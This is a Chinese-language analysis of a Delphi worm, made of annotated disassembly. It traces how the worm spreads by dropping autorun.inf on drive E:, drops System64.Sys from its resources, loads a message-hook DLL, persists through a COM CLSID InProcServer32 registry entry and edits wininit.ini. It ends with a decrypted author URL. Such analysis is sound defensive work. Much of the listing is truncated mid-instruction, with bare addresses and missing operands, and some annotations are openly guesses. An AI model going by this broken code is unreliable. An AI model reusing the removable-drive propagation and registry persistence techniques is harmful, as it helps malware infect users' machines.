首先用PEiD查看,發現是用UPX加殼;脫殼後顯示爲Delphi編寫。
從文件最後讀出文件大小(已加密),XOR解密後得到真正的文件大小。
下面是簡單的分析過程:
將病毒文件及啓動文件autorun.inf複製到E盤,然後設置文件隱藏屬性
0040484D |. 8BEC mov ebp,esp
00404851 |.
00404853 |.
00404855 |. 55 push ebp
00404856 |. 68 02494000 push SysAuto1.00404902
0040485B |. 64:FF30 push dword ptr fs:[eax]
0040485E |. 64:8920 mov dword ptr fs:[eax],esp
00404861 |. 8D55 FC lea edx,dword ptr ss:[ebp-4]
00404864 |. B8 18494000 mov eax,SysAuto1.00404918 ; ASCII "E:/"
00404869 |. E8 86FEFFFF call SysAuto
0040486E |. 68 80000000 push 80 ; /FileAttributes = NORMAL
00404873 |. 68
00404878 |. E8 BFFBFFFF call <jmp.&KERNEL32.SetFileAttributesA>; /SetFileAttributesA
0040487D |. 68
00404882 |. E8 25FBFFFF call <jmp.&KERNEL32.DeleteFileA> ; /DeleteFileA
00404887 |.
00404889 |. 68
0040488E |. 8D
00404891 |.
00404893 |. E
00404898 |. 8B
0040489B |. E8 E4EEFFFF call SysAuto1.00403784
004048AB |. B8 98494000 mov eax,SysAuto1.00404998 ; ASCII "E:/AutoRun.Inf"
004048B0 |. E8 EB030000 call SysAuto1.00404CA0
004048B5 |.
004048B7 |. 68
004048BC |. E8 7BFBFFFF call <jmp.&KERNEL32.SetFileAttributesA>; /SetFileAttributesA
004048CB |. E8 5CFFFFFF call SysAuto
004048D0 |.
004048D5 |. E8 82FBFFFF call <jmp.&KERNEL32.Sleep> ; /Sleep
004048DA |. 8B55 FC mov edx,dword ptr ss:[ebp-4]
004048DD |. B8 18494000 mov eax,SysAuto1.00404918 ; ASCII "E:/"
004048E2 |. E8 45FFFFFF call SysAuto
004048E7 |.
004048E9 |.
004048EA |. 59 pop ecx
004048EB |. 59 pop ecx
004048EC |. 64:8910 mov dword ptr fs:[eax],edx
004048EF |. 68 09494000 push SysAuto1.00404909
004048FC |. E8 27ECFFFF call SysAuto1.00403528
00404901 /. C3 retn
創建autorun.inf文件
; SysAuto1.00404CA0 -- write a caller-supplied buffer to a file.
; Delphi register convention: eax = file name, edx = data to write.
; The caller at 004048AB passes "E:/AutoRun.Inf" in eax, so this is the
; routine that drops autorun.inf on the removable drive.
; Returns eax (copied from edi): 0 when CreateFileA returned
; INVALID_HANDLE_VALUE, otherwise -1 (0FFFFFFFFh) after the write.
; WriteFile's return value is never examined, so -1 only means the file
; was opened and closed, not that the data was actually written.
00404CA0 /$ 53 push ebx
00404CA1 |. 56 push esi
00404CA2 |. 57 push edi
00404CA3 |. 51 push ecx ; reserves one scratch dword on the stack (see lea [esp+4] at 00404CCF)
00404CA4 |. 8BF2 mov esi,edx ; esi = data string (2nd argument)
00404CA6 |. 8BD8 mov ebx,eax ; ebx = file name (1st argument)
00404CA8 |. 33FF xor edi,edi ; edi = 0: default return value for the failure path
00404CAA |.
00404CAC |.
00404CAE |.
00404CB0 |.
00404CB2 |.
00404CB4 |. 68
00404CB9 |. 8BC3 mov eax,ebx
00404CBB |. E ; call truncated in the listing; its result becomes the FileName argument below
00404CC0 |. 50 push eax ; |FileName (derived from the path passed in eax)
00404CC1 |. E8 DEF6FFFF call <jmp.&KERNEL32.CreateFileA> ; /CreateFileA -- the other arguments (access, share mode, disposition) are truncated above
00404CC6 |. 8BD8 mov ebx,eax ; ebx = file handle
00404CC8 |. 83FB FF cmp ebx,-1 ; INVALID_HANDLE_VALUE?
00404CCB |. 74 ; je -- target truncated; the only jump label in this routine is 00404CF9, so a failed open appears to return with edi still 0
00404CCD |.
00404CCF |. 8D4424 04 lea eax,dword ptr ss:[esp+4] ; presumably the scratch dword reserved by push ecx -- TODO confirm (the instruction at 00404CCD is truncated)
00404CD3 |. 50 push eax ; lpNumberOfBytesWritten
00404CD4 |. 8BC6 mov eax,esi
00404CD6 |. E8 45E9FFFF call SysAuto1.00403620 ; helper applied to the data string; its result is pushed in the nNumberOfBytesToWrite position -- presumably a length routine, TODO confirm
00404CDB |. 50 push eax ; nNumberOfBytesToWrite
00404CDC |. 8BC6 mov eax,esi
00404CDE |. E ; call truncated in the listing; its result becomes the Buffer argument
00404CE3 |. 50 push eax ; |Buffer (derived from the data passed in edx)
00404CE4 |. 53 push ebx ; |hFile
00404CE5 |. E8 7AF7FFFF call <jmp.&KERNEL32.WriteFile> ; /WriteFile -- eax (success flag) is not tested afterwards
00404CEA |. 53 push ebx ; /hFile
00404CEB |. E8 ; call truncated in the listing (takes the handle as its only visible argument)
00404CF0 |. 53 push ebx ; /hObject
00404CF1 |. E8 9EF6FFFF call <jmp.&KERNEL32.CloseHandle> ; /CloseHandle
00404CF6 |. 83CF FF or edi,FFFFFFFF ; edi = -1: "success" (reached only on the open-succeeded path)
00404CF9 |> 8BC7 mov eax,edi ; return value; also the join point for the failed-open branch
00404CFB |.
00404CFC |.
00404CFD |. 5E pop esi
00404CFE |. 5B pop ebx
00404CFF /. C3 retn
向C:/Program Files/Internet Explorer/PLUGINS/複製文件System64.Sys
00405719 |. A
0040571E |. 8B00 mov eax,dword ptr ds:[eax]
00405720 |. E8 5FE0FFFF call SysAuto1.00403784
00405725 |. 50 push eax
00405726 |. 8D55 D4 lea edx,dword ptr ss:[ebp
00405729 |. A
0040572E |. E8
00405733 |. 8B45 D4 mov eax,dword ptr ss:[ebp
00405736 |. E8 49E0FFFF call SysAuto1.00403784
0040573B |. 50 push eax ; |String1
00405741 |.
00405743 |. 74 5D je short SysAuto
00405745 |. 8B0D C8604000 mov ecx,dword ptr ds:[
0040574B |. 8B09 mov ecx,dword ptr ds:[ecx]
0040574D |. A
00405752 |. 8B
00405758 |. E8 0FDFFFFF call SysAuto
0040575D |. A
00405762 |. 8B00 mov eax,dword ptr ds:[eax]
00405764 |. E8 1BE0FFFF call SysAuto1.00403784
00405769 |. 50 push eax ; /FileName
00405771 |. A
00405776 |. 8B00 mov eax,dword ptr ds:[eax]
00405778 |. E8 07E0FFFF call SysAuto1.00403784
0040577D |. 50 push eax
0040577E |. A
00405783 |. E8 FCDFFFFF call SysAuto1.00403784
00405788 |. 50 push eax ; |ExistingFileName
00405789 |. E8 0EECFFFF call <jmp.&KERNEL32.CopyFileA> ; /CopyFileA
0040578E |.
00405790 |. A
00405795 |. 8B00 mov eax,dword ptr ds:[eax]
00405797 |. E8 E8DFFFFF call SysAuto1.00403784
0040579D |. E8 9AECFFFF call <jmp.&KERNEL32.SetFileAttributes>; /SetFileAttributesA
004057B2 |. E8 B5DEFFFF call SysAuto
004057B7 |. B
004057BC |. B9
004057CC |. A
004057D1 |. E8 AEDFFFFF call SysAuto1.00403784
004057D6 |. 8BD8 mov ebx,eax
004057D8 |. 53 push ebx ; /FileName = "C:/Program Files/Internet Explorer/PLUGINS/System64.Sys"
004057D9 |. E8 CEEBFFFF call <jmp.&KERNEL32.DeleteFileA> ; /DeleteFileA
004057DE |. 53 push ebx ; /Path
004057DF |. E8 44EEFFFF call <jmp.&shlwapi.PathFileExistsA> ; /PathFileExistsA
判斷文件是否存在,如果不存在,從資源中取出
004057E4 |.
004057E6 |. 74 33 je short SysAuto1.0040581B
004057E8 |. A1 CC764000 mov eax,dword ptr ds:[4076CC]
004057ED |. 50 push eax
004057EE |. A
004057FA |. BA
004057FF |. B8
00405804 |. E8
00405809 |. 8B
00405814 |. E8
00405819 |. EB 17 jmp short SysAuto1.00405832
0040581B |> A1 CC764000 mov eax,dword ptr ds:[4076CC]
00405820 |. 50 push eax ; /Arg1 => 009B02B4
00405821 |. 8BCB mov ecx,ebx ; |
00405823 |. BA
00405828 |. B8
0040582D |. E8 0EF2FFFF call SysAuto
00405832 |> BA A4594000 mov edx,SysAuto
00405837 |.
00405839 |. E
0040583E |.
00405840 |.
00405846 |. BA B4594000 mov edx,SysAuto1.004059B4 ; ASCII "xxkxxxxjtrj8jok"
0040584B |.
0040584D |. E8 AEF1FFFF call SysAuto
00405852 |.
00405854 |.
0040585E |.
00405860 |.
00405862 |.
00405864 |.
00405866 |. A1 50764000 mov eax,dword ptr ds:[407650] ; |
0040586B |. 50 push eax ; |Arg2 => 00400000 ASCII "MZP"
0040586E |. BA A4594000 mov edx,SysAuto
00405873 |. B
00405878 |.
00405880 |. E8 87EBFFFF call <jmp.&KERNEL32.LoadLibraryA> ; /LoadLibraryA
00405885 |. 8BD8 mov ebx,eax
00405887 |. 85DB test ebx,ebx
00405889 |. 74
0040588B |. 68 CC594000 push SysAuto1.004059CC ; /ProcNameOrOrdinal = "MsgHookOff"
00405890 |. 53 push ebx ; |hModule
00405891 |. E8 4EEBFFFF call <jmp.&KERNEL32.GetProcAddress> ; /GetProcAddress
00405896 |. A3 D0764000 mov dword ptr ds:[4076D0],eax
0040589B |. 68 D8594000 push SysAuto1.004059D8 ; /ProcNameOrOrdinal = "MsgHookOn"
004058AB |. 833D D0764000>cmp dword ptr ds:[4076D0],0
004058B2 |. 74 41 je short SysAuto
004058B4 |. 833D D4764000>cmp dword ptr ds:[4076D4],0
004058BB |. 74 38 je short SysAuto
004058BD |. FF15 D4764000 call dword ptr ds:[4076D4]
004058CB |>
004058CD |.
004058CF |.
004058D1 |. 56 |push esi ; |pMsg
004058D2 |. E8 D5EBFFFF |call <jmp.&user32.GetMessageA> ; /GetMessageA
004058D7 |.
004058D9 |.^ 75 EA /jnz short SysAuto
004058DB |. FF15 D0764000 call dword ptr ds:[4076D0]
004058E1 |.
004058E3 |. E8 9CEBFFFF call <jmp.&user32.CloseWindow> ; /CloseWindow
004058E8 |. 53 push ebx ; /hLibModule
004058E9 |. E8 CEEAFFFF call <jmp.&KERNEL32.FreeLibrary> ; /FreeLibrary
004058EE |.
004058FA |. B9 E8594000 mov ecx,SysAuto1.004059E8 ; |ASCII "{754FB7D8-B8FE-4810-B363-A788CD
004058FF |. BA
00405904 |. B8 02000080 mov eax,80000002 ; |
00405909 |. E
0040590E |. A
00405913 |. E8 6CDEFFFF call SysAuto1.00403784
00405918 |. 50 push eax ; /Arg1
00405919 |. E8
0040591E |>
00405920 |.
00405921 |. 59 pop ecx
00405922 |. 59 pop ecx
00405923 |. 64:8910 mov dword ptr fs:[eax],edx
00405926 |. 68 40594000 push SysAuto1.00405940
0040592B |> 8D45 D4 lea eax,dword ptr ss:[ebp
0040592E |. BA 07000000 mov edx,7
00405933 |. E
00405938 /. C3 retn
從資源中取出system64.sys
00404AA0 |. 68
00404AA5 |. 8B45 FC mov eax,dword ptr ss:[ebp-4] ; |
00404AA8 |. 50 push eax ; |FileName
00404AA9 |. E
00404AAE |. 8BD8 mov ebx,eax
00404AB0 |. 83FB FF cmp ebx,-1
00404AB3 |. 74 58 je short SysAuto1.00404B0D
00404AB5 |. 57 push edi ; /hResource
00404AB6 |. A1 50764000 mov eax,dword ptr ds:[407650] ; |
00404ABB |. 50 push eax ; |hModule => 00400000 (SysAuto1)
00404ABC |. E8
00404ACA |. 8B
00404ACD |. 50 push eax ; |Buffer
00404ACE |. 53 push ebx ; |hFile
00404ACF |. E8
00404AD4 |. 8B45 08 mov eax,dword ptr ss:[ebp+8]
00404AD7 |. E8 44EBFFFF call SysAuto1.00403620
00404ADC |. 8BF8 mov edi,eax
00404ADE |.
00404AE0 |. 8D
00404AE3 |. 50 push eax
00404AE4 |. 57 push edi
00404AE5 |. 8B45 08 mov eax,dword ptr ss:[ebp+8]
00404AE8 |. E8 97ECFFFF call SysAuto1.00403784
00404AED |. 50 push eax ; |Buffer
00404AEE |. 53 push ebx ; |hFile
00404AEF |. E8
00404AF4 |. 53 push ebx ; /hFile
00404AF5 |. E8 3AF9FFFF call <jmp.&KERNEL32.SetEndOfFil>; /SetEndOfFile
00404AFA |. 53 push ebx ; /hObject
00404AFB |. E8
00404B00 |. 8BC6 mov eax,esi
00404B02 |. E8 B
00404B07 |. 56 push esi ; /hResource
00404B08 |. E8 B
00404B0D |>
00404B0E |. 5E pop esi
00404B
00404B10 |. 8BE5 mov esp,ebp
00404B12 |. 5D pop ebp
00404B13 /. C2 0400 retn 4
修改註冊表進行文件啓動
00404D00 /$ 55 push ebp
00404D01 |. 8BEC mov ebp,esp
00404D03 |.
00404D06 |. 53 push ebx
00404D07 |. 56 push esi
00404D08 |. 8BF1 mov esi,ecx
00404D
00404D0D |.
00404D
00404D12 |. C
00404D19 |. 8D4D F8 lea ecx,dword ptr ss:[ebp-8]
00404D
00404D1D |. 8D4D FC lea ecx,dword ptr ss:[ebp-4] ; |
00404D20 |. 51 push ecx ; |pHandle
00404D21 |.
00404D23 |. 68
00404D28 |.
00404D
00404D
00404D2E |. 52 push edx ; |Subkey
00404D
00404D30 |. E8 4FF6FFFF call <jmp.&advapi32.RegCreateKe>; /RegCreateKeyExA
00404D35 |. 53 push ebx ; /String = ""
00404D36 |. E8
00404D3B |. 40 inc eax
00404D
00404D3D |. 53 push ebx ; |Buffer
00404D3E |.
00404D40 |.
00404D42 |. 56 push esi ; |ValueName
00404D43 |. 8B45 FC mov eax,dword ptr ss:[ebp-4] ; |
00404D46 |. 50 push eax ; |hKey
00404D47 |. E8
00404D
00404D
00404D50 |. E8
00404D55 |. 5E pop esi
00404D56 |. 5B pop ebx
00404D57 |. 59 pop ecx
00404D58 |. 59 pop ecx
00404D59 |. 5D pop ebp
00404D
00404D5D 8D40 00 lea eax,dword ptr ds:[eax]
; SysAuto1.00404D60 -- register a COM in-process server under HKEY_CLASSES_ROOT.
; Makes three calls to the registry-write helper at 00404D00 (which calls
; RegCreateKeyExA and then a value-set routine; see that listing). For each
; call: eax = 80000000h (the predefined HKEY_CLASSES_ROOT handle value),
; edx = subkey built in the global string at 00407684, ecx = value name,
; stack argument = value data.
;   1) "CLSID/{754FB7D8-B8FE-4810-B363-A788CD..." -> value named by 00404E14, data 00404E14 (contents not shown; presumably "" i.e. the default value -- TODO confirm)
;   2) same key + "/InProcServer32"                  -> data = this routine's own stack argument [ebp+8]
;   3) same key, value name truncated at 00404DC8     -> data "Apartment" (presumably ThreadingModel -- TODO confirm)
; Persistence/detection note: the CLSID above is the registry artifact this
; sample leaves; the caller that supplies [ebp+8] is not in this listing.
; The "/" separators in the strings look like a transcription artifact of
; this listing (registry paths use "\").
00404D60 /$ 55 push ebp
00404D61 |. 8BEC mov ebp,esp
00404D63 |. 53 push ebx
00404D64 |. BB 84764000 mov ebx,SysAuto1.00407684 ; ebx -> global string variable holding the key path
00404D69 |. 8BC3 mov eax,ebx
00404D6B |. BA E44D4000 mov edx,SysAuto1.00404DE4 ; ASCII "CLSID/{754FB7D8-B8FE-4810-B363-A788CD
00404D70 |. E8 E3E7FFFF call SysAuto1.00403558 ; stores the CLSID path into [ebx] (it is read back at 00404DA2 and 00404DBF)
00404D75 |. 68 144E4000 push SysAuto1.00404E14 ; value data for call 1 (contents not visible here)
00404D
00404D
00404D81 |. 8BD0 mov edx,eax ; | edx = subkey (converted from [ebx]; the conversion call is truncated above)
00404D83 |. B9 144E4000 mov ecx,SysAuto1.00404E14 ; | ecx = value name -- same address as the pushed data
00404D88 |. B8 00000080 mov eax,80000000 ; | HKEY_CLASSES_ROOT
00404D8D |. E8 6EFFFFFF call SysAuto1.00404D00 ; /SysAuto1.00404D00 -- registry-write helper, call 1
00404D92 |. 8BC3 mov eax,ebx
00404D94 |. BA 204E4000 mov edx,SysAuto1.00404E20 ; ASCII "/InProcServer32"
00404D99 |. E8 8AE8FFFF call SysAuto1.00403628 ; appends "/InProcServer32" to the global path (read back below)
00404D9E |. 8B45 08 mov eax,dword ptr ss:[ebp+8] ; this routine's argument
00404DA1 |. 50 push eax ; value data for call 2 (written under InProcServer32)
00404DA2 |. 8B03 mov eax,dword ptr ds:[ebx]
00404DA4 |. E8 DBE9FFFF call SysAuto1.00403784 ; string-to-API-pointer helper used before every Win32 string argument in this listing
00404DA9 |. 8BD0 mov edx,eax ; | edx = subkey ("CLSID/{...}/InProcServer32")
00404DAB |. B9 144E4000 mov ecx,SysAuto1.00404E14 ; | ecx = value name (same as call 1)
00404DB0 |. B8 00000080 mov eax,80000000 ; | HKEY_CLASSES_ROOT
00404DB5 |. E8 46FFFFFF call SysAuto1.00404D00 ; /SysAuto1.00404D00 -- registry-write helper, call 2
00404DBA |. 68 304E4000 push SysAuto1.00404E30 ; ASCII "Apartment" -- value data for call 3
00404DBF |. 8B03 mov eax,dword ptr ds:[ebx]
00404DC1 |. E8 BEE9FFFF call SysAuto1.00403784
00404DC6 |. 8BD0 mov edx,eax ; | edx = same InProcServer32 subkey
00404DC8 |. B9 ; value name truncated in the listing (presumably "ThreadingModel" -- TODO confirm)
00404DCD |. B8 00000080 mov eax,80000000 ; | HKEY_CLASSES_ROOT
00404DD2 |. E8 29FFFFFF call SysAuto1.00404D00 ; /SysAuto1.00404D00 -- registry-write helper, call 3
00404DD7 |. 5B pop ebx
00404DD8 |. 5D pop ebp
00404DD9 /. C2 0400 retn 4 ; stdcall-style cleanup of the single stack argument
根據操作系統版本修改wininit.ini的內容
00404E
00404E52 |. C70424 940000>mov dword ptr ss:[esp],94
00404E59 |. 54 push esp ; /pVersionInformation
00404E
00404E
00404E64 |.
00404E67 |.
00404E6D /. C3 retn
00404E6E 8BC0 mov eax,eax
; SysAuto1.00404E70 -- queue a file operation on two paths, by one of two
; mechanisms selected by the test at 00404E81/00404E83 (condition truncated;
; the caption says the choice depends on the OS version).
; Register convention: eax -> ebx (first path, assignment truncated at
; 00404E7A) and edx -> esi (second path).
; Branch A (00404E85..00404ED2): both paths are passed as |LongPath to an
; API whose name is truncated (104h = MAX_PATH output buffers), then
; WritePrivateProfileStringA writes Key=String into a profile file -- per
; the caption, wininit.ini; the section and file name arguments are
; truncated at 00404EC8.
; Branch B (00404ED4..): a file API taking |ExistingName (name truncated;
; the parameter label suggests a move/rename-style call -- TODO confirm)
; is invoked with esi's path as the existing name.
00404E70 /$ 53 push ebx
00404E71 |. 56 push esi
00404E72 |. ; 6-byte instruction truncated (presumably the stack-frame reservation for the two buffers -- TODO confirm)
00404E78 |. 8BF2 mov esi,edx ; esi = second path argument
00404E
00404E
00404E81 |.
00404E83 |. 74 ; je -- branch to 00404ED4 presumed from the jump label there; condition truncated
00404E85 |. 68 04010000 push 104 ; output buffer size = 104h = MAX_PATH
00404E
00404E91 |. 50 push eax ; output buffer (lea truncated at 00404E8A)
00404E92 |. 8BC6 mov eax,esi
00404E94 |. E8 EBE8FFFF call SysAuto1.00403784 ; string-to-API-pointer helper used before every Win32 string argument in this listing
00404E99 |. 50 push eax ; |LongPath (esi's path)
00404E
00404E
00404EA4 |. 8D4424 04 lea eax,dword ptr ss:[esp+4] ; second output buffer
00404EA8 |. 50 push eax
00404EA9 |. 8BC3 mov eax,ebx
00404EAB |. E8 D4E8FFFF call SysAuto1.00403784
00404EB0 |. 50 push eax ; |LongPath (ebx's path)
00404EB1 |. E8 ; call truncated in the listing (same API as above, judging by the identical argument pattern)
00404EB6 |.
00404EBB |. 8D8424 090100>lea eax,dword ptr ss:[esp+109] ; | by stack offset, the buffer filled from esi's path
00404EC2 |. 50 push eax ; |String
00404EC3 |. 8D4424 08 lea eax,dword ptr ss:[esp+8] ; | by stack offset, the buffer filled from ebx's path (esp+4 before the push above)
00404EC7 |. 50 push eax ; |Key
00404EC8 |. 68 ; section name pushed here; truncated in the listing (file name argument also not visible)
00404ECD |. E8 9AF5FFFF call <jmp.&KERNEL32.WritePrivat>; /WritePrivateProfileStringA -- return value not checked
00404ED2 |. EB 17 jmp short SysAuto1.00404EEB ; skip branch B
00404ED4 |> ; branch B entry (jump target)
00404ED6 |. 8BC3 mov eax,ebx
00404ED8 |. E ; call truncated (00403784 by the pattern used elsewhere -- TODO confirm)
00404EDD |. 50 push eax ; pushed first, so this is the later parameter of the API below (presumably the new/destination name)
00404EDE |. 8BC6 mov eax,esi
00404EE0 |. E8 9FE8FFFF call SysAuto1.00403784
00404EE5 |. 50 push eax ; |ExistingName (esi's path)
00404EE6 |. E8 ; call truncated in the listing
00404EEB |> ; join point for both branches
00404EF1 |. 5E pop esi
00404EF2 |. 5B pop ebx
00404EF3 /. C3 retn
中間還有一段是解密作者隱藏的數據,下面是解密出的數據
解密出病毒作者的網址及其他數據
009B
009B
009B
009B
009B
009B
009B
009B
009B00AF 65 74
www.plince.net/XX/nn.asp